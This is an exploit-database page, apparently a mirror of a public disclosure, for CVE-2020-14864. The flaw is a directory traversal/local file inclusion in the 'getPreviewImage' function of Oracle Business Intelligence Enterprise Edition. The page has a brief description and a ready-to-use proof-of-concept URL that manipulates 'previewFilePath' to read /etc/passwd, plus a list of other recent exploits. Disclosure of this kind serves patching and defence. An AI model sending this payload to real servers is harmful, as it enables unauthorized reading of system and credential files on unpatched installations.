Oracle business intelligence enterprise edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 getpreviewimage directory traversal/local file inclusion Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-10-28 | Type : webapps | Platform : linux
This exploit / vulnerability Oracle business intelligence enterprise edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 getpreviewimage directory traversal/local file inclusion is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion
# Date: 2020-10-27
# Exploit Author: Ivo Palazzolo (@palaziv)
# Reference: https://www.oracle.com/security-alerts/cpuoct2020.html
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/bi-enterprise-edition-downloads.html
# Version: 5.5.0.0.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: SUSE Linux Enterprise Server
# CVE: CVE-2020-14864

# Description
A Directory Traversal vulnerability has been discovered in the 'getPreviewImage' function of Oracle Business Intelligence Enterprise Edition. The 'getPreviewImage' function is used to get a preview image of a previously uploaded theme logo. By manipulating the 'previewFilePath' URL parameter an attacker with access to the administration interface is able to read arbitrary system files.

# PoC
https://TARGET/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd

Oracle business intelligence enterprise edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 getpreviewimage directory traversal/local file inclusion


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php

▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple

▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Oracle business intelligence enterprise edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 getpreviewimage directory traversal/local file inclusion Vulnerability / Exploit